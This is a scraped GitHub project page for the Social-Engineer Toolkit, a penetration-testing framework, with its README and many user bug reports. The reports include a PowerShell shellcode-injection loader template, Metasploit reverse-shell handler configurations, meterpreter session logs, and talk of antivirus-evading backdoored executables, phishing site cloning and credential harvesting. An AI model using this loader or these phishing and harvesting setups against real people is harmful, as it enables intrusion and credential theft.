
social-engineer-toolkit's Introduction

The Social-Engineer Toolkit (SET)

  • Copyright © 2020
  • Written by: David Kennedy (ReL1K) @HackingDave
  • Company: TrustedSec

Description

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period. Please read the LICENSE under readme/LICENSE for the licensing of SET.

Supported platforms:

  • Linux
  • Mac OS X (experimental)

Installation

Install via requirements.txt

pip3 install -r requirements.txt
python3 setup.py 

Install SET

Windows 10 WSL/WSL2 Kali Linux

sudo apt install set -y

Kali Linux on Windows 10 is a minimal installation so it doesn't have any tools installed. You can easily install Social Engineer Toolkit on WSL/WSL2 without needing pip using the above command.

Linux

git clone https://github.com/trustedsec/social-engineer-toolkit/ setoolkit/
cd setoolkit
pip3 install -r requirements.txt
python setup.py

SET Tutorial

For a full document on how to use SET, visit the SET user manual.


Bugs and enhancements

For bug reports or enhancements, please open an issue here.

social-engineer-toolkit's People

Contributors

addenial, allfro, badgerops, buzzdeee, cabalist, cclauss, crawl3r41, crblanaru, drmckay, fabacab, fibonascii, fnk0c, fourcels, hackingdave, j0fer, kas21, kradical, l1ghtn1ng, lin8x, lnxg33k, m1cr0xf7, markcda, mikecjudge, raffaele-forte, santosomar, shinjayong, stasinopoulos, vinnytroia, xexzy, zordrak


social-engineer-toolkit's Issues

SET 5.3.2 Infectious Media Generation Failure

I have had multiple instances of infectious media generation fail on me today within SET 5.3.2.
As an example, this is the most recent circumstance through which I experienced a failure.
Menu Options Followed:
1, 3, 1, 5, 7
I was attempting to generate an Adobe Flash Player "Button" Remote Code Execution exploit with a Windows Meterpreter Reverse HTTPS payload.
Upon completion of the file generation, I received the following message.
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory

It looks as though it is attempting to place the file out in the /root/.set/ directory, but in this situation it is trying to write that data into template.pdf.
I have looked around for the payload to be in other possible locations, but was unable to find the 'generated' media.
This issue has taken place for multiple different kinds of exploits today, most of which are reverse meterpreter HTTPS payloads, though.

Thanks,
@c0ncealed

SET confuses lines

First I thought I messed up the config file, but then I did 3 fresh installs and the problem persists (v 5.4.7).

(2) Website Attack Vectors
(1) Java Applet Attack Method
(2) Site Cloner
(2) Windows Reverse_TCP Meterpreter
(4) Backdoored Executable

It seems that SET confuses the lines on .set/meta_config ;
(Tried to disable EnableStageEncoding=OFF , but same results)

Only the last try handler gets the correct values to the correct topic.

set:payloads> PORT of the listener [443]:
[*] Generating x86-based powershell injection code for port: 22
[*] Generating x86-based powershell injection code for port: 53
[*] Generating x86-based powershell injection code for port: 443
[*] Generating x86-based powershell injection code for port: 21
[*] Generating x86-based powershell injection code for port: 25
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.


Web Server Launched. Welcome to the SET Web Attack.


[--] Tested on Windows, Linux, and OSX [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...


   =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]
+ -- --=[ 1264 exploits - 694 auxiliary - 202 post ]
+ -- --=[ 331 payloads - 33 encoders - 8 nops ]

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 22
EnableStageEncoding => 22
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 53
EnableStageEncoding => 53
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 443
EnableStageEncoding => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 21
EnableStageEncoding => 21
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 25
EnableStageEncoding => 25
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >

Unable to make a java applet attack with own payload

I made a java applet attack and chose "Import your own executable". After opening the link (ip address) the applet pops up and then nothing happens after "run".

The following error is showing up: GET /asdfeaala/404. So this file can't be found in the webserver folder.

In the webserver folder are the "signed_update.jar" and a "wefwfa" file.

In the HTML code of the cloned website three of the "werafia" files are mentioned. The first one, wefwfa, can be found, but the second one, asdfeaala, cannot any more.

I'm using the latest set version

pyinjector payload not compiling

Running SET 5.1 in Kali Linux on 64-bit. Trying to generate a python payload (using option 1, option 4, option 15). SET will create the meterpreter.alpha file in the root of SET but no executable is created, though states that msf.exe has been created in the root of SET.

Looking at the wrong location, disregard. Apologies!

Java applets don't work by default

It looks like Java 8 doesn't like anything but signed and trusted applets by default now. Just tested it and it denied the self-signed applet with the "factory-shipped" settings. Any bypass/workaround available (or in the works)?

Question

About SMS Spoofing.

In sms_launch.py I updated the new lines for 5.4.8 and now I get the templates, and have a couple of questions.

  1. SohoOS (buggy): what is it? And I get "Error while sending SMS" (every time).
    It could be from my end, not sure. It would be very cool to be more verbose.
  2. Android Emulator (need to install Android Emulator): do I have to edit any files for it to work?

Thanks, Syther21

SMS Spoofing Attack Vector error: global name 'setdir'

I'm using the newest SET 5.4.7 and have had this problem for a long time, but got out of Linux for months and now I'm back in it, and even after so many updates it's still there, and I just wanted to inform you. I have never tried this ever, and would be very interested in experimenting with it on my phone.
I'm running Kali Linux

Here's what I did when I opened setoolkit:

  1. social-engineering attacks
  2. SMS spoofing attack vector
  3. perform a SMS spoofing attack
  1. SMS attack single number

single SMS attack
set:sms> send sms too: 7249880000

  1. pre-defined Template

set:sms> use a predefined template or craft a one time SMS?:1

[!] Something went wrong, printing the error: global name 'setdir' is not defined

Unicode in the generate_powershell_alphanumeric_payload function

This is not so much a bug report/issue as it is an explanation of a comment in the code.
https://github.com/trustedsec/social-engineer-toolkit/blob/27cc394/src/core/setcore.py#L1253-L1270

I believe this is not a bug in Python, but a result of different unicode encodings. It appears Python defaults to UTF-8 whereas Windows is expecting UTF-16 (Little Endian). The following Python code should accomplish the same thing as the loop that inserts the null bytes.

powershell_command.encode('utf_16_le')

and the whole thing could be condensed to:

# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = ('''$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = %s;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };''' % (shellcode))

return base64.b64encode(powershell_command.encode('utf_16_le'))
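The equivalence the comment above describes, as an added example (not code from SET or from the issue author): the manual NUL-insertion loop and encode('utf_16_le') produce identical bytes for ASCII and Latin-1 text, diverge once a character falls outside that range, and the base64 form decodes back with the same codec, which is also how an analyst reads an -EncodedCommand value found in a log.

```python
import base64


def interleave_nulls(command: str) -> bytes:
    """Reproduce the hand-written loop the issue refers to: after every
    character, insert a 0x00 byte.  bytearray.append() only accepts values
    below 256, so this breaks for any character beyond Latin-1."""
    out = bytearray()
    for ch in command:
        out.append(ord(ch))
        out.append(0x00)
    return bytes(out)


def encode_utf16le(command: str) -> bytes:
    """The replacement proposed in the issue: let the codec do the work."""
    return command.encode("utf_16_le")


def loop_matches_utf16le(command: str) -> bool:
    """True when both approaches yield the same bytes; False when the manual
    loop cannot even represent the input (the edge case utf_16_le handles)."""
    try:
        return interleave_nulls(command) == encode_utf16le(command)
    except ValueError:
        return False


def to_encoded_command(command: str) -> str:
    """Base64 of the UTF-16LE bytes: the form PowerShell's -EncodedCommand
    parameter expects (returned as text rather than bytes)."""
    return base64.b64encode(encode_utf16le(command)).decode("ascii")


def from_encoded_command(b64: str) -> str:
    """Inverse operation: what a defender does with an -EncodedCommand
    argument captured in process-creation logs to see the real command."""
    return base64.b64decode(b64).decode("utf_16_le")


if __name__ == "__main__":
    # Constructed, harmless sample command used only to show the round trip.
    sample = "Write-Output 'SET issue demo'"
    print("loop == utf_16_le for ASCII:", loop_matches_utf16le(sample))
    print("loop == utf_16_le for U+20AC:", loop_matches_utf16le("\u20ac"))
    encoded = to_encoded_command(sample)
    print("encoded:", encoded)
    print("decoded:", from_encoded_command(encoded))
```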

teensy powershell bug

When I try and run the teensy powershell injection attack I get the following error message and SET crashes

[*] Generating x86-based powershell injection code for port: 22
[*] Generating x86-based powershell injection code for port: 53
[*] Generating x86-based powershell injection code for port: 443
[*] Generating x86-based powershell injection code for port: 21
[*] Generating x86-based powershell injection code for port: 25
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...

[!] Something went wrong, printing the error: name 'path' is not defined

I have tried running SET as both sudo -E ./setoolkit, sudo ./setoolkit and sudo -E /usr/bin/setoolkit and sudo /usr/bin/setoolkit and I still get the path not defined error in Kali Linux with a up to date version of SET.

SET not using custom port for web server

I am using a VPN to port forward (since I have issues using just my router). I am port forwarding 4444, 4445, and 1604. I set the port for the webserver in SET_config to 4445. I launch the Java applet attack and complete everything, setting the listeners at 4444 and 1604. However, when I try to go to the IP on port 4445, it doesn't work like it should. Yet when I go to ports 4444 or 1604, there is a response saying "sending stage" (though obviously I didn't run the applet since the web server was down). Canyouseeme.org says my ports are open, so I don't think that is an issue. I am running Kali with the latest version of SET. Thanks. Everything is documented here:

http://pastebin.com/SNMtRLXx

idea

Hey Dave,

I am taking a look at doing some refactoring of setup.py by using platform.dist(), so you can then tell if you are on Ubuntu, as it will output this: platform.dist()[0] Out[13]: 'Ubuntu'. There is a dedicated function for Windows and Mac, but I am only going to be looking at Linux stuff. Just wondering which files I would need to take a look at; please bear with me, I am newish to Python. I can also add support for other Linux distros that you do not currently support, but I'm not sure which ones.

After update - AttributeError: 'NoneType' object has no attribute 'lower' error

After downloading the latest SET update, running into the following when starting - note this is running on the Pwn Pad:

root@56e514396ab6:/opt/pwnpad/set# ./set
[-] New set_config.py file generated on: 2013-03-24 16:44:10.522442
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-03-24 16:44:10.522442
[*] SET is using the new config, no need to restart
Traceback (most recent call last):
  File "./set", line 46, in <module>
    start_dns()
  File "/opt/pwnpad/set/src/core/setcore.py", line 1456, in start_dns
    if dns_check.lower() == "on":
AttributeError: 'NoneType' object has no attribute 'lower'

Credential Harvester enhancement

Would it be possible to not capture the password, but just the username when running the credential harvester? Up to this point I have been able to modify the python script to accomplish this, but would rather it be an option in the config. That way the python script doesn't need to be modified upon new releases.

README and the directory readme/ cause issues on OSX

OSX can't handle a directory and a file named the same thing, even with different case. I don't understand why but that's what it does.

So trying to edit or submit edits on GitHub is annoying, as you'll have to delete one to solve the issue.

Suggestion to rename the README file to README.md or txt

Multiple error in SET

  1. SMS Spoofing Attack Vector : when the body of the SMS is just one line, SET can't process it
  2. Credential Harvester Attack Method & Tabnabbing Attack Method : don't generate report?? And still have bug when typing IP the server will POST

Hash corruption in Powerdump

I tried using Get-PassHashes in Nishang's powershell library and this appeared to give corrupted hashes when LM hashes are disabled. As this is based on your work I tried the Powerdump in SET and this appears to also have the same corruption.

The issue is well documented http://blog.spiderlabs.com/2012/08/stamping-out-hash-corruption.html

Would be cool if you could also send the updated file upstream to Metasploit too!

http://pastie.org/private/zjb6clibmlylhqva0hhg (examples uses nishangs script based on powerdump)

please rename the main binary to something more logical

It's called se-toolkit currently, but the tool is known as "set".
That means if somebody would type set[tab] in the CLI he wouldn't be able to find all set binaries.

The same goes for gui menu. KDE menu doesn't even search by two characters ("se").

I propose to call it "setoolkit"

Thank you.

Cannot use custom metasploit install?

I have metasploit installed and working built manually from the rapid7 git repository.

When I point METASPLOIT_PATH at the path of the installed metasploit directory (with no trailing slash) I get the following error:

[!] Metasploit path not found. These payloads will be disabled.
[!] Please configure in the config/set_config.

Is a manual metasploit running from git supported?

~/.set/meta_config with meterpreter/reverse_https requires a real LHOST

I was troubleshooting a campaign I was doing, and found an issue with the creation of the 'meta_config' file used to run metasploit.

I am running behind NAT, so my actual IP isn't my public IP, which doesn't seem to affect this, but will affect the fix.

My 'meta_config' file was generated as follows:


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 22
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 53
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 443
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 21
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 25
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 8080
exploit -j

Notice the LHOST is set to '0.0.0.0'. This apparently does not work. I read on a mailing list, that setting the LHOST properly would fix it, and then later in the thread, it said the code had been fixed around it, but it doesn't apparently work now.

I changed my resource file to have my actual IP. I could get the meterpreter sessions, but whenever I tried to interact with them, I saw:

MSF (s:4 j:5) exploit(handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls
[-] Unknown command: ls.
meterpreter > help
meterpreter > help
meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > dir
[-] Unknown command: dir.
meterpreter > background
MSF (s:4 j:5) exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.11.33:443 -> x.x.x.x:53634 (x.x.x.x)
  2   meterpreter x86/win32               192.168.11.33:53 -> x.x.x.x:53636 (x.x.x.x)
  3   meterpreter x86/win32               192.168.11.33:8080 -> x.x.x.x:53637 (x.x.x.x)
  4   meterpreter x86/win32               192.168.11.33:443 -> x.x.x.x:53635 (x.x.x.x)

MSF (s:4 j:5) exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > help
meterpreter > [-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_loadlib request.


meterpreter > 

Once I finally changed the 'meta_config' file to use my NAT external IP, instead of '0.0.0.0', it worked:

MSF (s:4 j:5) exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2012-02-14 07:46:32 -0500  .
40777/rwxrwxrwx  0     dir   2012-02-16 09:24:34 -0500  ..

meterpreter > sysinfo
Computer        : USER-6D07D5DAB0
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
Background session 1? [y/N]  
MSF (s:4 j:5) exploit(handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2012-02-14 07:46:32 -0500  .
40777/rwxrwxrwx  0     dir   2012-02-16 09:24:34 -0500  ..

meterpreter > 

OS X: netstat error when checking Port 80

Edit: Seems like I was mistaken, regarding the following. The problem was not w/ netstat in this case, but was with a version of Pow I was running locally. The netstat command is throwing errors on OS X, though.

It appears that the command which is checking whether a process is active on the port is returning false positives on Mac OS X (note: haven't tried on other platforms). For example, I have a process that is listening on port 4380 and as such, the following netstat command is returning a false positive:

netstat -a |grep LISTEN |grep '80'
tcp4       0      0  localhost.4380         *.*                    LISTEN 

Furthermore, looks like netstat -antp is also broken on Mac OS X, as seen below.

If I have time later I'll fix and submit pull-req.

Edit: This may help too
Darwin HOSTNAME 12.4.0 Darwin Kernel Version 12.4.0: Wed May 1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64

set:payloads> Port to use for the reverse [443]:900

[*] Cloning the website: http://REDACTED
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

[!] ERROR:Something is running on port 80. Seeing if it's a stale SET process...
netstat: option requires an argument -- p
Usage:  netstat [-AaLlnW] [-f address_family | -p protocol]
    netstat [-gilns] [-f address_family]
    netstat -i | -I interface [-w wait] [-abdgRt]
    netstat -s [-s] [-f address_family | -p protocol] [-w wait]
    netstat -i | -I interface -s [-f address_family | -p protocol]
    netstat -m [-m]
    netstat -r [-Aaln] [-f address_family]
    netstat -rs [-s]

[!] If you want to use Apache, edit the config/set_config
[!] Exit whatever is listening and restart SET
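An added example (not SET's own code) of why the quoted netstat -a | grep LISTEN | grep '80' test misfires and how an exact port comparison avoids it; the sample netstat output is constructed to mirror the localhost.4380 line above plus a Linux-style listing, since the local-address column uses '.' before the port on macOS/BSD and ':' on Linux.

```python
# Constructed sample output: the first block mimics the macOS/BSD netstat
# listing from the issue (only a listener on 4380), the second a Linux one.
NETSTAT_MACOS_4380_ONLY = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  localhost.4380         *.*                    LISTEN
tcp4       0      0  localhost.52801        localhost.4380         ESTABLISHED
"""

NETSTAT_LINUX_80 = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp6       0      0 :::8080                 :::*                    LISTEN
"""


def naive_port_check(netstat_output: str, port: int) -> bool:
    """The substring test SET used (grep LISTEN | grep '80'): any LISTEN line
    containing the digits matches, so 4380 and 8080 count as port 80."""
    return any("LISTEN" in line and str(port) in line
               for line in netstat_output.splitlines())


def local_port(line: str):
    """Return the local port of a LISTEN line, or None for any other line.
    The local address is the 4th column on both BSD/macOS ('localhost.4380',
    '*.80') and Linux ('0.0.0.0:80', ':::8080'); the port is whatever follows
    the last '.' or ':' in that column."""
    fields = line.split()
    if len(fields) < 6 or fields[5] != "LISTEN":
        return None
    local = fields[3]
    cut = max(local.rfind("."), local.rfind(":"))
    if cut < 0:
        return None
    port_text = local[cut + 1:]
    return int(port_text) if port_text.isdigit() else None


def port_is_listening(netstat_output: str, port: int) -> bool:
    """Exact-match replacement for the naive check: compare the parsed port."""
    return any(local_port(line) == port for line in netstat_output.splitlines())


if __name__ == "__main__":
    print("naive check, port 80 on macOS sample:", naive_port_check(NETSTAT_MACOS_4380_ONLY, 80))
    print("exact check, port 80 on macOS sample:", port_is_listening(NETSTAT_MACOS_4380_ONLY, 80))
    print("exact check, port 80 on Linux sample:", port_is_listening(NETSTAT_LINUX_80, 80))
```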

"LHOST" not set in "meta_config" when "POWERSHELL_INJECTION" is "OFF"

Don't know if I'm doing something wrong, but with the latest version of SET from the repositories running in an up to date Kali, if I configure the option "POWERSHELL_INJECTION" to "OFF" and then try to make a Java Applet attack with a "Windows Meterpreter Reverse HTTPS" payload, the "LHOST" option is not set:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (/root/.set/meta_config)> set LHOST
[-] Unknown variable
Usage: set [option] [value]

As I can confirm in the file "~/.set/meta_config":

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set EnableStageEncoding true
set ExitOnSession false
set LPORT 22
exploit -j

Everything works as expected if I turn the "POWERSHELL_INJECTION" on.
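A checker for the generated meta_config that reports the three symptoms quoted in the issues above (shifted values such as LPORT false and EnableStageEncoding 22, an empty set LHOST when POWERSHELL_INJECTION is OFF, and LHOST 0.0.0.0 with reverse_https), written here as an added example rather than SET's own code; the sample files are constructed from the quoted output, and the option names are assumed to be the msfconsole names shown there.

```python
import ipaddress
import re

# Constructed meta_config samples modelled on the ones quoted in the issues.
META_CONFIG_SHIFTED = """\
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set EnableStageEncoding 22
set ExitOnSession false
set LPORT false
exploit -j
"""

META_CONFIG_EMPTY_LHOST = """\
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set EnableStageEncoding true
set ExitOnSession false
set LPORT 22
exploit -j
"""

META_CONFIG_UNSPECIFIED_LHOST = """\
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 443
exploit -j
"""

META_CONFIG_GOOD = """\
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.2
set LPORT 443
set EnableStageEncoding false
set ExitOnSession false
exploit -j
"""

BOOL_OPTIONS = ("ENABLESTAGEENCODING", "EXITONSESSION")
HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]+")


def parse_blocks(text: str) -> list:
    """Split a resource script into handler blocks: each 'use ...' line starts a
    block, 'set KEY VALUE' lines fill its options (KEY upper-cased, VALUE may be
    empty, as in the 'set LHOST' line from the issue)."""
    blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("use "):
            current = {"module": line[4:].strip(), "options": {}}
            blocks.append(current)
        elif line.startswith("set ") and current is not None:
            parts = line.split(None, 2)
            if len(parts) >= 2:
                current["options"][parts[1].upper()] = parts[2] if len(parts) == 3 else ""
    return blocks


def validate_block(index: int, block: dict) -> list:
    """Return human-readable problems for one handler block (empty list = OK)."""
    problems = []
    opts = block["options"]
    if not opts.get("PAYLOAD"):
        problems.append(f"block {index}: PAYLOAD not set")
    lhost = opts.get("LHOST", "")
    if not lhost:
        problems.append(f"block {index}: LHOST missing or empty")
    else:
        try:
            if ipaddress.ip_address(lhost).is_unspecified:
                problems.append(f"block {index}: LHOST {lhost} is the unspecified address")
        except ValueError:
            # Hostnames are legal for LHOST; only reject obviously malformed values.
            if not HOSTNAME_RE.fullmatch(lhost):
                problems.append(f"block {index}: LHOST {lhost!r} is not an address or hostname")
    lport = opts.get("LPORT")
    if lport is None:
        problems.append(f"block {index}: LPORT not set")
    elif not lport.isdigit() or not 1 <= int(lport) <= 65535:
        problems.append(f"block {index}: LPORT {lport!r} is not a port number")
    for name in BOOL_OPTIONS:
        value = opts.get(name)
        if value is not None and value.lower() not in ("true", "false"):
            problems.append(f"block {index}: {name} {value!r} is not true/false")
    return problems


def validate_meta_config(text: str) -> list:
    """Validate every handler block in a meta_config and collect all problems."""
    return [p for i, b in enumerate(parse_blocks(text), 1) for p in validate_block(i, b)]


if __name__ == "__main__":
    for name, text in (("shifted", META_CONFIG_SHIFTED), ("empty LHOST", META_CONFIG_EMPTY_LHOST),
                       ("0.0.0.0", META_CONFIG_UNSPECIFIED_LHOST), ("good", META_CONFIG_GOOD)):
        print(name, "->", validate_meta_config(text) or "OK")
```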

Option for MLITM no longer available

I see some references to src/core/set.py to delete MLITM but the code is still there. Also the documentation for it still exists in the web attack menu. Is this feature getting phased out or is this a bug? It looks like this was last supported in b0b78b6. Are there plans to re-integrate this feature?

set-automate child=pexpect.spawn("python set")

Hi,

I have been working with set-automate a lot on a ubuntu 12.04 LTS 32bit server and I ran into the issue when using set-automate it exits after the following:

/usr/share/setoolkit$ sudo ./set-automate auto.txt
[*] Spawning SET in a threaded process...
[*] Sending command 1 to the interface...
[*] Sending command 2 to the interface...
[*] Sending command 3 to the interface...
[*] Sending command 2 to the interface...
[*] Sending command 1.1.1.1 to the interface...
[*] Sending command http://gmail.com to the interface...
[*] Finished sending commands, interacting with the interface..

looking at the code on line 57 there is a child process spawned for 'set' but there is not 'set' executable file anymore within SET it has been replaced by se-toolkit if installing from git. Therefore no child process is spawned and set-automate exits. I did some testing and set-automate works if line 57 is changed to 'child=pexpect.spawn("python se-toolkit")'. This is a non-issue in Kali Linux since there is a 'set' executable file within the SET installation directory.

Thanks!

-bl

Harvester/Tabnabbing methods only work on port 80?

I'm trying to perform the Harvester/Tabnabbing methods from SET outside my local network. Since my ISP blocks port 80, I changed the parameter WEB_PORT on set_config to another port (e.g. 3505). After that I executed the Harvester/Tabnabbing and sent my external IP with the port to a friend; the site loaded normally on his PC and I got the hits on my terminal. However, when my friend clicks the button to send the data I did not receive an answer and the site in his browser failed to load the page. It seems the cloned site tries to answer on port 80 and not on the same port that I had changed. So, is there any way that I can fix it? Thank you.

Redirect Problem

SET is meant to redirect to the original page, after the user makes a login attempt on the cloned one. There is a small error that is preventing it from doing so. It is missing the ":" in "http://".

For example, if I clone https://facebook.com the user is redirected to https//facebook.com and the browser cannot understand the address.

JAVA applet doesn't run

First of all, when I try this option, the configuration page doesn't open, it just reopens se-toolkit:

6) Update SET configuration

I have set up the Java applet over the net. When I send it to my friend, I have to put the port number after my external IP, for example 123.123.123.123:444 (open port). The clone page doesn't load on my friend's computer and it just keeps loading very slowly. I, however, do get a response from him.

Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (751134 bytes) to 174.0.152.xx

so I am assuming that because the java applet doesn't load on their side to click on, I can't get a shell opened.

help please?

thank you.

Enhancement

trustedsec commented 2 days ago Owner

The SMS stuff uses some pay services except the android emulator - for actual attacks, would recommend using something like site cloner with cred harvester - since iPhone/Android wouldn't be vulnerable to java applet attack, you would want to use that or possibly a metasploit exploit.
trustedsec closed the issue 2 days ago

slyther21 commented a minute ago

Well, I understand that to a point. But I believe my "OPINION" is only mine, and not meant to offend you.
Out of all the other programs in SETOOLKIT, SMS-Spoofing feels like it was just thrown in there and doesn't get any attention. I feel like it skipped a BIG step in development, and I would like to help the best I can to back-step it and make it 100x better than what it is, since it doesn't even work anyhow without paying. That just describes it. We need to build an SMS-Gateway. I have lots of ideas and improvements if you're interested. If you just comment and let me know: I already have the cellphone email code list and info on what to do, I just have no programming skills yet.

/usr/share/set/src/html/unsigned/self_sign.py Issue

Hi Dave,

